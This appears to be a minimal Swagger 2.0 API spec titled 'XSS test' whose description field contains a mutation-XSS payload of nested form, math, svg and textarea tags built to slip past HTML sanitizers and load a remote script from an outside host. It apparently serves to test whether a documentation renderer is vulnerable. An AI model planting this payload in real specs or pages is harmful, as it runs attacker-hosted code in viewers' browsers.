swagger: '2.0'
info:
  title: XSS test
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script src="https://sshahirs.aka.corp.amazon.com:4443/cdel.js"></script>"></form>
